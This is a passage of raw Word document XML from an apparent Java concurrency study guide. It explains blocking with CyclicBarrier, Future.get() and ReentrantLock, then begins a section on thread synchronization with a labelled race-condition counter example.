          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Using CyclicBarrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C729E" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A CyclicBarrier is used to make threads wait until a certain number of threads have reached a common barrier point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A5ECAB" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1157"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The await() method blocks the calling thread until all threads have arrived at the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39752AB9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4C370"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CyclicBarrier barrier = new CyclicBarrier(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA7D6C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAA7AFE"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Thread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D2556"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE1D85"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barrier.await(); // Blocks the thread until all threads reach the barrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F69E2"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 Perform task after barrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DD287"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    } catch (InterruptedException | BrokenBarrierException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A24D33"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278744B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12124820"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6265B63C"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t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D07FE" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Using Future.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F88033" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Future.get() method blocks the calling thread until the computation represented by the Future is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B1824" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread will wait until the task represented by the Future is completed and the result is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA0154"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1F511"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ExecutorService executorService = Executors.newSingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B36944"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Future&lt;Integer&gt; future = executorService.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA123F"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 Perform some long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FACBBC"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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66C4C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43974209" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCD1AE7"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Blocks until the result is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038DDC46"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Integer result = future.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448206D" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Using Lock.lock() / ReentrantLock.lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10DBE1" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lock() method of ReentrantLock is used for acquiring a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFF7F8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thread will block while trying to acquire a lock if another thread is already holding the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068A588"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A33457"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ReentrantLock lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BB097" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22527988"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lock.lock(); // Block the thread until the lock is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D26BB"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093A2FD"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 Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0693A"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E319B14"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 xml:space="preserve">    lock.unlock(); // Always unlock the lock in the finally block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173EBB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE7E6C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218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9E428D2">
          <v:rect id="_x0000_i1840" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4E40D" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043DB971"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These are the main ways to block threads in Java. Each method has a different use case and serves a specific purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFDB1F" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>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Thread.sleep()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for pausing the thread for a specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48862182" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>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wait()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>notify()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for thread synchronization in shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC04B9F" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Semaphore</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are high-level concurrency utilities for managing thread interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821F2F8" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>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Future.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for blocking until the result of a concurrent task is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972F6A0" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as ReentrantLock can block a thread until it acquires a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C2C7F" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choosing the appropriate mechanism depends on the concurrency problem you're trying to solve and the nature of thread interactions in your program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037EB47" w14:textId="1B746056" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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8276C58">
          <v:rect id="_x0000_i1841" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A2B5D" w14:textId="77777777" w:rsidR="00A15D83" w:rsidRPr="00CE4B95" w:rsidRDefault="00A15D83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="_Toc196307755"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is thread synchronization in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="6B9461A8" w14:textId="7D9A0F48" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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hread synchronization is a mechanism that ensures that two or more threads do not simultaneously access shared resources in a way that can lead to data inconsistency or corruption. Synchronization is important in concurrent programming where multiple threads are running in parallel and may attempt to access the same data or resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36736763"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When two or more threads share data, and one thread modifies that data while others are reading or modifying it, it can cause problems such as race conditions, data corruption, and inconsistent results. Synchronization provides a way to control access to shared resources to ensure that only one thread can access the resource at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04521676" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why Synchronization is Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C346A02"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">In a multi-threaded environment, if multiple threads access the same resource (like a variable, object, or database), it could lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This can cause data inconsistency, where the data being manipulated by one thread may not be correctly updated when another thread accesses it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3B0F5"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113885DE"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074477A"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6E524" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF17D67"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 Without synchronization, two threads may access and modify 'count' at the same time, leading to incorrect results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64C4C3"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD5FDB"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count++;  // Not thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B32782"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FF5CA0" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37913B05"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599200F0"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AD406"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4C60A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E61FF"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In the above example, if two threads call increment() at the same time, it may result in incorrect values for count due to the race condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005250DA" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Types of Thread Synchronization in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F46D2B" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>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Synchronized Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D10BE" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>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Synchronized Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48367E" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>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Locks and ReentrantLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095F6827" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>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Concurrent Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B549F" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
